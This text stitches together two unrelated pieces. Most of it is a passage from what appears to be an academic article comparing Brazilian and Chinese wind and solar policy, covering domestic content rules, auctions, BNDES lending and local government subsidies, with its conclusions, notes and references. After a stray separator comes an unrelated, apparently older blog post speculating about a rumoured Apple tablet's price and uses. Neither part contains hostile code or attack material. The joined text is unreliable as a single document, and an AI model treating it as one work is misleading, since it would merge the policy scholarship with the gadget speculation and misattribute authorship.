Proinfa’s domestic content requirements have significantly changed the supplier landscape for wind power. As recently as 2008, there was only one manufacturer of wind components in Brazil, the German-based Wobben Windpower, which was unable to keep up with the demand of the first Proinfa stage.44 In simulations, the national production requirements were shown to reduce early wind-generation capacity below what would otherwise have existed if Brazil had simply imported the components to meet Proinfa’s demand.45 As auctions for wind power showed continuing demand, other firms followed Wobben Windpower to Brazil. By 2014, there were four manufacturers of wind turbines and seven turbine assemblers in Brazil, along with thirteen manufacturers of towers and thirteen of parts and components (with some individual firms producing in more than one category).46 These tallies come from the Brazilian Agency of Industrial Development, which mapped the Brazilian wind-power production chain in an effort to spur additional private investment and state-based industrial policy for the sector.47

Financial incentives in the form of subsidized credit from BNDES also helped draw international wind energy firms to Brazil and spurred domestic firms to set up production. After 2005, BNDES allowed a flexible timeline for implementation of its 60-percent domestic content requirement, making individual agreements with firms that conditioned ongoing support on moving production to Brazil.48 At the end of 2011, however, BNDES informed six of the eleven firms that they had not nationalized enough of their production to allow BNDES to finance contracts for their products.49 BNDES has since written an extended document that details exactly how it accounts for domestic content in turbines and the required stages of compliance with the law.50 By 2015, for example, BNDES will only finance domestically produced nacelles, which are among a turbine’s most technologically advanced components. Prices for these domestically produced goods are higher than Chinese and European prices, squeezing installers, since the winning prices in the 2011 and 2012 auctions were very low.51

### Solar Power

The first stage of Proinfa did not include solar power, which continues to lag well behind wind power. Brazil has many of the same interests in solar-powered electricity as in wind: solar installations can be assembled quickly, adding more capacity to the grid without creating new dependencies on imported or fossil fuels. Solar’s higher prices and the technical challenges involved in creating domestic production lines for solar components have been the major blocks.52 To date, very few demand-side interventions promote solar power in Brazil. Solar power has been far too expensive to compete in open auctions to supply the national grid.
In October 2014, EPE held an auction for solar, wind, and biomass—the first reserve auction for solar power. The solar power generation capacity that does exist—about 20 MW in 2012—is limited to small, distributed solar installations, mostly in isolated and remote areas. The timing of the demand-side incentives for solar production responded to the drop in global solar prices, as world installed capacity soared and Chinese producers entered the market. That same drop in prices—not yet enough to make solar fully competitive with other electricity sources, but likely to become so soon—has generated a heated debate about whether Brazil should adopt solar power by simply importing the ever-cheaper internationally produced components or by trying to localize production.53

Unlike wind and other alternative renewable fuels, solar power production involves few heavy, low-technology components of the kind that make a country’s entry into component production easy. Instead, solar panels make up 50 percent of the value-added of the installation, and the PV panels likely to be used in Brazil require highly refined silicon. Brazil has the capacity to build cells and PV modules and has large amounts of high-quality quartz that could be refined into silicon. However, it does not have the technical capacity to do the refining.54 BNDES has been funding two firms to develop the purification process, and is looking to develop new technology that demands less electricity.55 ANEEL opened a small research and development competition in 2011 to insert solar power into the Brazilian electricity matrix; around 130 firms have formed an industry association to further explore possibilities.56

In the meantime, the debate about whether to offer more incentives continues. As already noted, the Brazilian public–private partnership approach relies on the response of private firms to government auctions by bidding to supply electricity. For them, the exact rules chosen affect their participation.57 Finding the right balance between the conditions that will draw generation firms into public auctions, the policies demanded by would-be producers of components, and prices consumers will tolerate is a delicate prospect. The future of renewable energy in Brazil depends on it.

## Chinese National Renewable Energy Programs and Incentives

The development of renewable energies in China follows national laws and renewable energy programs set by the central government. The Renewable Energy Law (2005) and its 2009 amendments comprise the core policy framework. The most important measures include the introduction of FITs, guidelines on cost-sharing arrangements between utilities and electricity end users, creation of the Renewable Energy Development Special Fund, and various other investment incentives for solar and wind power electricity generation.58 In parallel, various national planning targets intended to stimulate the development of solar and wind energy capacity were announced by the National Development and Reform Commission (NDRC), the powerful bureaucracy in charge of China’s overall long-term economic and social planning. The leadership’s decision to task NDRC with oversight of renewable energy development signals how integral renewables are to economic planning. To encourage the implementation of national plans, binding targets are built into the “cadre management system,” an incentive scheme used to assess and monitor the performance of officials.
To advance up the ladder and receive bonus payments, government officials and managers of SOEs need to meet these targets as part of their annual performance assessment; repeated non-implementation can be penalized through redeployment to a remote locality or even, in principle if not often in practice, outright expulsion from office.59

Provincial and sub-provincial governments also initiated numerous preferential policies that played critical roles in the rapid rise of solar and wind energies. In fact, many local governments nurtured home-grown solar and wind manufacturing enterprises well before national support programs were established and well ahead of the official designation of renewables as a strategic emerging industry (SEI) in 2010. As illustrated below, the solar PV manufacturing industry in particular experienced rapid expansion between 2003 and 2008 at local levels, before national supply-side incentives were put in place. Due to large variations in the patterns and sequencing of governments’ demand-side and supply-side interventions, the development trajectories of the wind and solar industries in China differ markedly.

### Wind Power

In the mid-2000s, the central government launched a slate of demand-side policies to create incentives for wind turbine installation across China. China’s Medium to Long-Term Development Plan for Renewable Energy (2007) set non-binding capacity targets for power generation companies with total capacity of over 5 GW, requiring them to generate 3 percent of their capacity from non-hydro renewable energy sources by 2010 and 8 percent by 2020. As no more specific guidance was given as to the proportion of wind versus solar, most power generators identified wind power as the more attractive option, given its comparative affordability and large growth potential.60 A wind concession program offered five rounds of competitive bidding during 2003 to 2007 to develop large wind farms. Successful bidders received guarantees that provincial transmission companies would purchase all electricity generated. Generally, SOEs outbid other investors by offering below-market prices, and they now account for more than 80 percent of the country’s installed wind power capacity.61 The program was seen as a success since it significantly brought down prices and awarded a total of 2.6 GW of permits to developers.62

These demand-side incentives were coupled with supply-side interventions that began in 2003 and benefited domestic wind turbine manufacturers. The bidding rounds included domestic content requirements that supported industrial development. Initial rounds required that 50 percent of the content of each wind turbine be made in China; this share increased to 70 percent in 2004. International wind firms transferred technology and know-how to China by setting up assembly plants and local manufacturing facilities.63 As a result, the domestic share of newly purchased wind power equipment increased from 30 percent in 2005 to 90 percent in 2010. In the context of emerging trade disputes with the US, in 2009 China removed the 70-percent domestic content requirement. Local governments’ strong mandate to create new growth and employment opportunities further benefited local wind turbine and component manufacturers.
Some local governments only approved wind projects under the condition that developers would set up local manufacturing.64 In the early and mid-2000s, fierce competition emerged among local governments around the establishment of renewable energy parks, wherein free or subsidized land and generous tax breaks were offered to producers. One example is the city of Changsha’s effort to develop a local wind turbine, component, and solar hub in its National Hi-tech Development Zone. Pressures to restructure the city away from reliance on cement and chemical plants were behind Changsha’s enthusiasm for renewables.65 The municipal government offered local renewable manufacturers the purchase of government land for a third of the regulated price, and a few companies even received the land for free. In addition, renewable energy companies benefited from significant tax breaks during their first years of operation and were aided by municipal governments in their efforts to obtain low-interest loans from the state-owned commercial banks. Because these low-cost loans and land provisions fall into the category of disallowed subsidies under WTO rules, the municipal government discontinued interviews on this issue in September 2010, when the topic became too sensitive in the context of emerging China–US trade disputes.

These strategic efforts by national, provincial, and municipal governments played a key role in the development and growth of China’s wind turbine and component manufacturing industry. At the national level, the NDRC played an important role in coordinating wind industrial policies by introducing binding renewable energy targets, domestic content requirements, concession rounds, financial incentives, and FITs, among others. State interventions in China were more generous than in Brazil, with state-owned banks and ministries offering large bidding rounds and soft loans to producers.

### Solar Power

Solar PV installations initially ranked low on the government agenda, since solar energy was perceived to be comparatively expensive.66 Solar PV deployment programs were small and aimed at off-grid power generation.67 Before 2009, total solar PV nationwide stood at only 160 MW installed capacity. While competitive bidding rounds during 2003–2007 for wind helped develop that sector, similar government support for solar began only after 2009. The minimal demand-side subsidies and the absence of large-scale consumer subsidy programs for Chinese citizens stand in sharp contrast to the full range of supply-side subsidies used to stimulate a domestic export-oriented solar PV manufacturing industry in China. The booming market for solar PV manufacturing was developed to meet rapidly rising demand in Europe and North America. Solar manufacturers benefited most notably from national FDI attraction policies, financial and tax incentives, R&D subsidies, and access to the national Renewable Energy Development Special Fund. Moreover, for its first solar power plant constructed in 2009, China allegedly required that 80 percent of each panel be made in China.68 Local governments were key players in the creation of preferential policies for PV manufacturing. In the early and mid-2000s, local governments encouraged local solar enterprises in pursuit of local tax revenue, employment, and prestige benefits.
For example, the Wuxi municipal government in Jiangsu province convinced various municipal-government-run investment companies and venture funds to provide 50 million RMB as starting capital for Wuxi Suntech, a small solar manufacturing company set up by a foreign-trained Chinese business entrepreneur in 2001.69 In Xinyu (Jiangxi), the municipal government invested $32 million (200 million renminbi (RMB)) in the newly formed LDK Solar enterprise in 2005 and provided additional land in a high-tech development zone. Xinyu officials also introduced LDK Solar’s business to the managers of the local branches of various state-owned banks. As a result, within a year of operation, LDK Solar secured large short-term loans from three banks. Its borrowings increased from $57 million in 2006 to $666 million in 2008, and the company’s debt-to-asset ratio increased from 47 percent in 2007 to 75 percent in 2008. LDK was no exception: over the past decade, the debt-to-asset ratio of many Chinese solar manufacturers passed 0.8, while most foreign competitors’ debt ratios rarely rise above 0.5.70
Baoding municipality in Hebei further illustrates the proactive role of sub-national governments. Baoding is today home to more than 40 solar power equipment producers. Among them is Yingli Green Energy, the largest solar PV manufacturer in the world in 2014. Yingli was set up in 1998 by a private entrepreneur. In 2001, the Baoding High-Tech Zone Administrative Committee designated solar power technologies and wind turbines as pillar industries of the municipality’s high-tech zone. Between 2003 and 2006, the Administrative Committee helped Yingli Green Energy to “wear a red hat” — meaning that it was formally registered as a local SOE, but it continued to operate independently. Yingli’s new designation helped the company access preferential long-term bank loans.71 Such state corporatist practices meant that Baoding’s solar firms were well positioned to ramp up production quickly when global demand for solar increased in 2004. By 2010, renewables accounted for three quarters of the total $2.9 billion in exports from the high-tech zone, and Baoding became known as a clean technology production hub in China.72

This rapid expansion of solar manufacturing was reinforced by regional competition between local governments to establish renewable energy manufacturing bases. More than 300 cities entered the solar PV manufacturing industry, leading to overcapacity of almost two times world demand for solar PV panels.73 In the rush to attract solar manufacturers, hundreds of renewable industrial parks were set up by local governments between 2003 and 2006. The creation of renewable industrial parks also offered additional revenues to local governments through real estate development.74 In one municipality in Jiangsu Province, for example, four of nine counties listed solar and wind as their top two priority sectors and created industrial parks to spearhead their development; many of these parks stayed largely empty, as they could not all attract renewable manufacturers.75 Anhui and Shanxi saw similar failed infrastructure investments.76 This headlong rush into renewables is partly an adverse effect of a cadre evaluation system that predisposes local officials to place excessive emphasis on achieving short-term economic growth targets.77

Since 2009, policy-makers have begun to address the large imbalance between supply- and demand-side measures.78 In 2009, two large-scale subsidy programs were initiated to promote on-grid deployment of solar energy. The Rooftop Subsidy Program (2009) provides RMB 15/W for rooftop systems and RMB 20/W for Building Integrated Photovoltaics (BIPV) systems, while the Golden Sun Demonstration Program (2009) provides a 50-percent subsidy for on-grid systems and a 70-percent subsidy for off-grid systems.79 Large-scale investments in solar installations were also driven by the National Energy Administration’s (NEA) two rounds of public auctions for solar-powered projects in 2009 and 2010.
These auctions offered successful bidders 25-year operational rights with guaranteed on-grid prices and also opened the door for numerous SOEs to join the sector.80 When prices dropped, the NDRC responded to lobbying pressure from manufacturers and suppliers and established China’s first FIT scheme for solar PV development in 2011, offering a tariff of RMB 1/kWh for newly approved projects.81 In 2013, the State Council, China’s highest decision-making unit in the executive branch of the government, issued a new statement stressing the importance of the domestic solar PV market.82 In quick succession, various institutions, including the NEA, the Ministry of Finance, the China Development Bank, and the State Grid Corporation of China issued relevant supporting policies, and plans were made to add another 10 GW during 2013–2015.83

Local governments actively introduced additional demand-side subsidies to supplement national demand-side interventions. For example, some provinces, such as Shandong and Liaoning, introduced supplemental tariffs to encourage wind and solar installations, offering, in addition to existing national tariffs, an extra RMB 0.10–0.11/kWh for wind and RMB 0.05–0.25/kWh for solar.84 Other provinces opted to offer additional tariffs or supplemental tax preferences to wind and solar developers on a project-by-project basis, giving developers considerable leverage at the bargaining table.

The recent switch in focus to solar PV installation can be explained by the combination of ongoing trade disputes with the EU and US and a struggling solar manufacturing industry. The EU and US initiated anti-dumping and countervailing investigations against Chinese solar PV products in 2011. At the same time, during the world financial crisis, foreign solar PV markets shrank as countries such as Germany cut subsidies. With the rush to solar at local levels, problems of industrial overcapacity and poor quality came to light. Government officials often opted for low-hanging fruit by investing in and supporting firms that focused just on simple solar mass production. As a result, by 2009 the market was flooded with simple solar PV modules with low conversion efficiency.85 The industry-wide oversupply drove down the prices of solar modules, while at the same time spot prices for silicon rose from $32 per kilogram in 2004 to $450 per kilogram in 2007.86 The result was a severe crisis in the domestic market, leading to layoffs and bankruptcies. Many solar manufacturers turned to local governments and banks for rescue packages, and local government officials were often only too willing to bail them out in order to protect local jobs and tax revenues, avoid damage to the government’s reputation, and secure their own career promotion in the short term.

The large-scale demand-based incentives resulted in additional solar PV installations of 13 GW in 2013 alone, and jobs in solar installation tripled in 2013 and 2014.87 This boost in domestic installations has since helped Chinese solar manufacturers return to rapid growth, and some manufacturers even added production capacity in 2013.
In summary, the institutions of state corporatism help explain the marked preference for supply-side interventions in China. Local state institutions were particularly important catalysts of the meteoric rise of Chinese solar, as officials eyed the benefits for economic growth, trade, employment, and prestige. Demand-side interventions came late and were employed primarily to save domestic solar manufacturers from bankruptcy and to reduce dependence on overseas markets.
## Conclusions
The policy outcomes in renewable energy development differ markedly in Brazil and China. In Brazil, renewable electricity advances are more modest, including some successes in wind turbine manufacturing, with the number of component manufacturers increasing and generation growing quickly. Yet very little deployment or manufacturing activity developed for solar energy, despite abundant solar resources in Brazil. By contrast, over the same period, China gained world leadership in wind and solar manufacturing and deployment.
We argue that the observed difference in renewable energy outcomes is partly explained by variation in state–business relations in Brazil and China. Brazil’s public–private partnership model and China’s state corporatist model are different approaches to aligning interests between the state and market players. The two approaches present mirror images in their implications for renewable energy development.
In Brazil, the public–private partnership approach encouraged a more coordinated and deliberate start to renewable energy generation that worked best for wind power. The Proinfa program used generous tariffs to draw private actors into wind production for Brazilian consumers and offered some market protection to encourage local production of wind turbines and components. Ongoing reserve auctions and subsidized finance from BNDES succeeded in drawing firms to both generation and industrial production, but also disciplined the industry by subjecting it to fierce price competition in the auctions and strict oversight of BNDES’ lending. Over time these allowed Brazil to develop a fairly lean, if not fully globally competitive and innovative, wind industry that helps meet national demand.
For solar power, the requirement that prices, generation, and parts production all intersect in ways that meet both public and private aims has, so far, failed. Many policy tools cannot be considered, either because private actors cannot be forced to participate or because public actors have been required to make fairly short-term calculations based on market-based fundamentals. Strong environmental interests in solar production and good material foundations for such an industry have run into limits imposed by the contradictions between price and domestic production aims.
In China, the state corporatist model gives central and local governments a greater number and variety of levers to promote solar and wind energies. Top managers in SOEs are part of the same annual cadre evaluation system as public officials, making it easier for central and local governments to steer enterprise behavior. Moreover, the banking system is dominated by a few large state-owned banks, which financed state-owned or state-connected enterprises in renewables. In China’s decentralized authoritarian political structure, local governments actively support the expansion of the wind and solar industries, as the examples of Baoding and Changsha illustrate.
Yet China’s state-corporatist approach also poses serious challenges for renewable energy development. Excessive interventions by local governments and local branches of state-owned banks sometimes distorted central government plans and policies. The easy provision of bank loans at local levels resulted in huge amounts of short-term debt, much of which seems destined to become non-performing loans.88 Such easy access to financing combined with the lack of hard budget constraints resulted in large-scale industrial overcapacity and, subsequently, to companies’ deteriorating finances.89
The pathologies of Chinese state corporatism are partly due to abiding interest misalignments between central and local levels of government. As we have seen, local officials focused inordinately on the short-term benefits of renewables and rushed headlong into the sector without due heed to market conditions, giving rise to a boom-and-bust cycle. This is partly an effect of deeply embedded Communist Party institutions encouraging tournament-style competition between local officials,90 but it also is a familiar downside of the state-centered approach, which has led to over-investment in other countries.
In sum, while China’s state-dominated model provided the institutional foundations of marked success in renewables development, the approach has come at significant cost. In particular, the prioritization of manufacturing renewables over the domestic demand for renewable energy itself created numerous undesirable outcomes, as the deployment of renewable energy was initially sacrificed in the drive to build up a strong renewables production sector.
For other developing countries, the experiences of Brazil and China illustrate the many tradeoffs and dilemmas that grid-based renewable electricity raises. Building wind and solar generation plants continues to be more expensive than fossil fuel plants for most countries, although the last decade of developments in Brazil and especially China have changed those calculations remarkably. For countries that want to balance higher generation costs with the economic gains of adding a dynamic new industry that produces components, the experiences of these two giants suggest they will face a delicate balancing act between these two aims.
## Notes
1. Harrison and Kostka 2014; Hochstetler and Viola 2012.
2. Steinberg and VanDeveer 2012.
3. Andrews-Speed 2012; Leite 2009.
4. See Purdon’s introduction to this special issue. See also Hall 1997; Steinberg and VanDeveer 2012.
5. See the summary in Fiorino 2011.
6. For example, Crepaz 1995; Poloni-Staudinger 2008; Scruggs 2003; Vogel 1986.
7. Victor and Heller 2007, 23–24.
8. Gratwick and Eberhard 2008; Victor and Heller 2007, 6–7.
9. Erdogdu 2014, 1.
10. Kessides 2012, 80.
11. Gratwick and Eberhard 2008; Kessides 2012; Victor and Heller 2007.
12. Erdogdu 2014, 7.
13. Leite 2009.
14. Landry 2008.
15. Oi 1992.
16. Oi 1992.
17. EIA 2014.
18. Barros et al. 2011.
19. Leite 2009, 62; Zhang, Andrews-Speed and Zhao 2013b, 335.
20. Fischer 2012.
21. Zhang et al. 2013a, 325; MAKE Consulting 2014.
22. Gosens and Lu 2014, 310.
23. Brazilian Agency for Industrial Development – ABDI 2014, 11.
24. IRENA 2014, 4.
25. Zhang and He 2013, 395.
26. Zhang and He 2013, 395.
27. Interview with Elbia Melo, Chief Executive Officer of the Associação Brasileira de Energia Eólica (ABEEólica, Brazilian Wind Energy Association), São Paulo, July 22, 2014. Melo was chief economist in the Ministry of Mines and Energy while the Proinfa program was being developed.
28. Presidência da República 2002.
29. Presidência da República 2003.
30. Interview Melo 2014.
31. Presidência da República 2003.
32. Governo do Brasil 2003, 10.
33. Interview with five members of the BNDES Infrastructure and Structuration of Projects sectors, Rio de Janeiro, June 2012; Telephone interview with Sérgio Weguelin, then Superintendent of the Environment sector of BNDES, June 2011.
34. Hochstetler and Montero 2013, 1491.
35. Interview BNDES.
36. Hochstetler and Montero 2013, 1485.
37. Interview Melo 2014; Interview with Milton Pinto, representative of the Centro de Estratégias em Recursos Naturais e Energia (CERNE), Natal, July 17, 2014.
38. Lucas, Ferroukhi, and Hawila 2013, 18–19.
39. Lucas, Ferroukhi, and Hawila 2013, 22.
40. Melo 2013, 131.
41. Melo 2013, 125.
42. Interview with representative of CPFL Renováveis, São Paulo, July 24, 2014; Interview with representative of Bons Ventos da Serra, Fortaleza, July 14, 2014.
43. Lucas, Ferroukhi, and Hawila 2013, 16, 20.
44. Dutra and Szklo 2008, 69.
45. Dutra and Szklo 2008, 73.
46. Brazilian Agency for Industrial Development – ABDI 2014, 11.
47. Interview with Eduardo Tosta, Project Specialist, Agência Brasileira de Desenvolvimento Industrial, September 2014.
48. Interview Melo 2014.
49. Melo 2013, 130.
50. BNDES 2012.
51. Melo 2013.
52. EPE 2012, 1.
53. Interview with official of Greenpeace Brasil, São Paulo, July 22, 2014; Interview Melo 2014.
54. EPE 2012, 17–18.
55. Interview BNDES 2012.
56. EPE 2012, 1–3.
57. Interview CPFL Renováveis 2014.
58. Zhang, Andrews-Speed and Zhao 2013b, 335.
59. Harrison and Kostka 2014; Kostka 2015.
60. Zhang, Andrews-Speed and Zhao 2013b, 335.
61. Yang et al. 2012, quoted in Zhang, Andrews-Speed, and Zhao 2013b, 338.
62. Gosens and Lu 2014, 312.
63. Lewis 2013.
64. GWEC 2012, 70.
65. Interviews with government officials from the Changsha Municipal Development and Reform Commission (DRC), Science and Technology Bureau, Construction Bureau, and Environmental Protection Bureau (EPB), Changsha, September 2010.
66. Becker and Fischer 2013, 449; Fischer 2012, 141.
67. Zhang and He 2013, 396.
68. China Builds High Wall to Guard Energy Industry, New York Times, July 13, 2009.
69. Dialogue with Shi Zhengrong 2010.
70. LDK Annual Reports quoted in Zhang 2014, 28; Energy Trend 2013.
71. Zhang 2014, 38.
72. Shin 2014.
73. Zhang et al. 2013c, 348.
74. Fischer 2014.
75. Interviews with government officials, various Science and Technology Bureaus, Jiangsu, June 2012.
76. Interviews with the standing vice manager at an industrial park administration committee, Anhui province, January 2007, and with government officials from the DRC in Datong, Shanxi province, September 2011.
77. Eaton and Kostka 2014.
78. Fischer 2012.
79. Zhang and He 2013, 397.
80. Fischer 2014, 92.
81. Zhang and He 2013, 398.
82. Government of China 2013.
83. For more details on these supporting policies, see Zhang 2014, 35.
84. Deutsche Bank 2012.
85. Gosens and Lu 2014, 310.
86. Trina Solar Annual Report, quoted in Zhang 2014, 25.
87. IRENA 2014, 12.
88. Zhang 2014, 24.
89. Zhang 2014, 44.
90. Zhou 2007.
## References
Andrews-Speed, Philip. 2012. The Governance of Energy in China. London: Palgrave Macmillan.

Barros, N., J.J. Cole, L.J. Tranvik, Y.T. Prairie, D. Bastviken, V.L.M. Huszar, P. Del Giorgio, and F. Roland. 2011. Carbon Emission from Hydroelectric Reservoirs Linked to Reservoir Age and Latitude. Nature Geoscience 4 (9): 593–596.

Becker, Bastian, and Doris Fischer. 2013. Promoting Renewable Electricity Generation in Emerging Economies. Energy Policy 56: 446–455.

Banco Nacional de Desenvolvimento Econômico e Social (BNDES). 2012. Anexo 1 - Etapas Fisicas e Conteudo Local que Devera Ser Cumpridos Pelo Fabricante.

Brazilian Agency for Industrial Development – ABDI. 2014. Mapping of Brazil’s Wind Power Industry Productive Chain. Brasília: ABDI, Ministério de Desenvolvimento, Indústria e Comercio.

Crepaz, Markus. 1995. Explaining National Variations of Air Pollution Levels: Political Institutions and their Impact on Environmental Policy-Making. Environmental Politics 4 (3): 391–414.

Deutsche Bank. 2012. Scaling Wind and Solar Power in China: Building the Grid to Meet Targets. February. Available at www.top1000funds.com/wp…/China_Wind_and_Solar-Feb20121.pdf, accessed July 9, 2014.

Dialogue with Shi Zhengrong. 2010.

Dutra, Ricardo Marques, and Alexandre Salem Szklo. 2008. Incentive Policies for Promoting Wind Power Production in Brazil: Scenarios for the Alternative Energy Sources Incentive Program. Renewable Energy 33 (1): 65–76.

Eaton, Sarah, and Genia Kostka. 2014. Authoritarian Environmentalism Undermined? Local Leaders’ Time Horizons and Environmental Policy Implementation in China. The China Quarterly 218: 359–380.

Energy Trend. 2013. 2012 Year Financial Evaluation: Solar Industries Continue to Face Financial Problems. Available at http://pv.energytrend.com/research/20130524-5261.html, accessed April 15, 2015.

EPE. 2013. Plano Decenal de Expansão da Energia 2022. Brasília: Ministério de Minas e Energia, Empresa de Pesquisa Energética.

EPE. 2012. Análise da Inserção da Geração Solar na Matriz Elétrica Brasileira. Rio de Janeiro: Ministério de Minas e Energia, Empresa de Pesquisa Energética.

EIA (US Energy Information Administration). 2014. Country Report China. February 4. Available at http://www.eia.gov/countries/cab.cfm?fips=ch, accessed July 9, 2014.

EIA (US Energy Information Administration). 2011. International Energy Statistics. http://www.eia.gov/countries/data.cfm, accessed August 3, 2014.

Erdogdu, Erkan. 2014. Investment, Security of Supply and Sustainability in the Aftermath of Three Decades of Power System Reform. Renewable and Sustainable Energy Reviews 31: 1–8.

Fiorino, Daniel J. 2011. Explaining National Environmental Performance: Approaches, Evidence and Implications. Policy Sciences 44 (4): 367–389.

Fischer, Doris. 2012. Challenges of Low Carbon Technology Diffusion: Insights from Shifts in China’s Photovoltaic Industry Development. Innovation and Development 2 (1): 131–146.

Fischer, Doris. 2014. Green Industrial Policies in China—the Example of Solar Energy. In Green Industrial Policies in Emerging Countries, edited by Anna Pegels. London: Routledge.

GWEC (Global Wind Energy Council). 2012. China Wind Power Outlook 2012.

GWEC (Global Wind Energy Council). 2014. Global Installed Wind Power Capacity Regional Distribution.

Gosens, Jorrit, and Yonglong Lu. 2014. Prospects for Global Market Expansion of China’s Wind Turbine Manufacturing Industry. Energy Policy 67: 301–318.

Government of China. 2013. State Council on Promoting the Healthy Development of the Photovoltaic Industry (guowuyuan guanyu cujin guangfu chanye jiankang fazhan de ruogan yijian), Document No. 24. Available at http://www.gov.cn/zwgk/2013-07/15/content_2447814.htm, accessed April 15, 2015.

Governo do Brasil. 2003. Diretrizes de Política Industrial, Tecnológica e de Comércio Exterior. Brasília: Governo Luiz Inácio Lula da Silva.

Gratwick, Katharine Nawaal, and Anton Eberhard. 2008. Demise of the Standard Model for Power Sector Reform and the Emergence of Hybrid Power Markets. Energy Policy 36 (10): 3948–3960.

Hall, Peter A. 1997. The Roles of Interests, Institutions and Ideas in the Comparative Political Economy of the Industrialized Nations. In Comparative Politics: Rationality, Culture, and Structure, edited by M.I. Lichbach and A.S. Zuckerman. Cambridge: Cambridge University Press.

Harrison, Tom, and Genia Kostka. 2014. Balancing Priorities, Aligning Interests: Developing Mitigation Capacity in China and India. Comparative Political Studies 47 (3): 449–479.

Hochstetler, Kathryn, and Alfred P. Montero. 2013. The Renewed Developmental State: The National Development Bank and the Brazil Model. Journal of Development Studies 49 (11): 1484–1499.

Hochstetler, Kathryn, and Eduardo Viola. 2012. Brazil and the Politics of Climate Change: Beyond the Global Commons. Environmental Politics 21 (5): 753–771.

IRENA (International Renewable Energy Agency). 2014. Renewable Energy and Jobs: Annual Review 2014. May. Available at http://www.irena.org/REjobs/, accessed July 9, 2014.

Kostka, Genia. 2015. Command Without Control: The Case of China’s Environmental Target System. Regulation & Governance, doi: 10.1111/rego.12082, forthcoming.

Kessides, Ioannis N. 2012. The Impacts of Electricity Reforms in Developing Countries. The Electricity Journal 25 (6): 79–88.

Landry, Pierre F. 2008. Decentralized Authoritarianism in China. New York: Cambridge University Press.

Leite, Antônio Dias. 2009. Energy in Brazil: Towards a Renewable Energy Dominated System. London: Earthscan.

Lewis, Joanna I. 2013. Green Innovation in China: China’s Wind Power Industry and the Global Transition to a Low-Carbon Economy. New York: Columbia University Press.

Lucas, Hugo, Rabia Ferroukhi, and Diala Hawila. 2013. Renewable Energy Auctions in Developing Countries. Abu Dhabi: International Renewable Energy Agency.

MAKE Consulting. 2014. Top Fifteen Wind Turbine Suppliers of 2013.

Melo, Elbia. 2013. Fonte Eólica de Energia: Aspectos de Inserção, Tecnologia e Competitividade. 27 (77): 125–142.

Oi, Jean C. 1992. Fiscal Reform and the Economic Foundations of Local State Corporatism in China. World Politics 45: 99–126.

Poloni-Staudinger, Lori M. 2008. Are Consensus Democracies More Environmentally Effective? Environmental Politics 17 (3): 410–430.

Presidência da República. 2002. LEI 10.438 de 26 de abril de 2002. Available at http://www.planalto.gov.br/ccivil_03/leis/2002/L10438.htm, accessed April 15, 2015.

Presidência da República. 2003. LEI 10.762 de 11 de novembro de 2003.

Scruggs, Lyle. 2003. Sustaining Abundance: Environmental Performance in Industrial Democracies. Cambridge: Cambridge University Press.

Shin, Kyoung. 2014. An Emerging Architecture of Local Experimentalist Governance in China: A Study of Local Innovations in Baoding, 1992–2012. Unpublished PhD dissertation, Cambridge, MA: MIT.

Steinberg, Paul F., and Stacy D. VanDeveer. 2012. Comparative Environmental Politics: Theory, Practice, and Politics. Cambridge, MA: MIT Press.

Victor, David, and Thomas C. Heller. 2007. Introduction and Overview. In The Political Economy of Power Sector Reform: The Experience of Five Major Developing Countries, edited by David Victor and Thomas C. Heller. Cambridge: Cambridge University Press.

Vogel, David. 1986. National Styles of Regulation: Environmental Policy in Green Britain and the United States. Ithaca: Cornell University Press.

Zhang, Sufang, and Yongxiu He. 2013. Analysis on the Development and Policy of Solar PV Power in China. Renewable and Sustainable Energy Reviews 21: 393–401.

Zhang, Sufang, Xiaoli Zhao, Philip Andrews-Speed, and Yongxiu He. 2013a. The Development Trajectories of Wind Power and Solar PV Power in China: A Comparison and Policy Recommendations. Renewable and Sustainable Energy Reviews 26: 322–331.

Zhang, Sufang, Philip Andrews-Speed, and Xiaoli Zhao. 2013b. Political and Institutional Analysis of the Successes and Failures of China’s Wind Power Policy. Energy Policy 56: 331–340.

Zhang, Sufang, Philip Andrews-Speed, Xiaoli Zhao, and Yongxiu He. 2013c. Interactions Between Renewable Energy Policy and Renewable Energy Industrial Policy: A Critical Analysis of China’s Policy Approach to Renewable Energies. Energy Policy 62: 342–353.

Zhang, Yuan. 2014. Chinese Government Intervention in the Development of Chinese Photovoltaic Industry. Unpublished Master Thesis, University of Waterloo.

Zhou, Li-an. 2007. Governing China’s Local Officials: An Analysis of Promotion Tournament Model. Economic Research Journal 2007 (7): 36–50.
## Author notes
* Hochstetler’s research was funded by the Social Sciences and Humanities Research Council of Canada. She thanks J. Ricardo Tranjan for research assistance. Kostka’s research was funded by the Karl Schlecht Foundation. We would like to thank the editors of this special issue, especially Mark Purdon, for their suggestions, as well as the anonymous reviewers and Sarah Eaton for helpful comments.
|
# Take Two Tablets and Call Me in a Month
Yes, everyone is going ape over the Mac tablet design that has (re)surfaced. But then, people went ape over every single iteration of the iMac, the iPod and pretty much any other Apple product that kicked off (or hinted at) a new form factor, so that's only to be expected.
What people seem to be forgetting is that, if it exists at all (and if it is ever brought to market, which is the biggest issue - tablet designs or mini-PCs like the OQO are a dime a dozen), it's bound to cost more or less the same as an iBook (a little less, in fact, if it's really only 8 inches wide).

Fab costs are likely to be, say, around 60-70% of an iBook's, and that's estimated mostly on parts (and heavily slanted by the smaller screen size, which is a major factor in component costs for one of these things).

Now assuming all this, placing it at US$999 would put it at the top of the iBook price range. Higher would be pointless, unless the goal was to only sell a couple of hundred. (There is also the option of this being some sort of new "iMac Mini", which would bump up the price point significantly, but let's run with the tablet idea for a bit.) Okay, for the sake of argument, let's make it US$799, assuming that if Apple followed a linear pricing/product placement strategy (which it often doesn't) it would have to sit somewhere in between an iPod and an iBook.
But would anyone buy it? That's the real question. I guess it would depend heavily on what it could do besides acting as a remote Mac display or an iTunes remote.
And I bet that, like most of Apple's modern gear, it would be squarely aimed at the home market, and integrated into the Apple "digital entertainment hub" - so no useful corporate functionality except wireless web surfing and note taking, which hardly justify even a quarter the price of a Windows Tablet PC.
So, home use would mean surfing the net, streaming music (and maybe video, if the new H.264 codec can run on it without flattening the batteries), maybe browsing iPhoto albums or (if Inkwell is good enough) sending short notes via e-mail. Paired with an Airport Express, it would be a pretty complete home entertainment system.
(By the way, the "it might also act as a phone" rumors floating around are nothing short of ridiculous. If the thing is going to act as a phone, the tablet form factor is one of the worst imaginable.)
Assuming it exists at all (always a nice thing to keep in mind), would you pay US$799 for a gadget that (as far as we know) has no compelling application to foster its adoption?
More to the point, I don't see myself spending that much money for yet another Apple one-off (or "classic model", as initial revisions are nearly always dubbed a few years down the road) that would most likely be either dead or obsolete in a year's time.
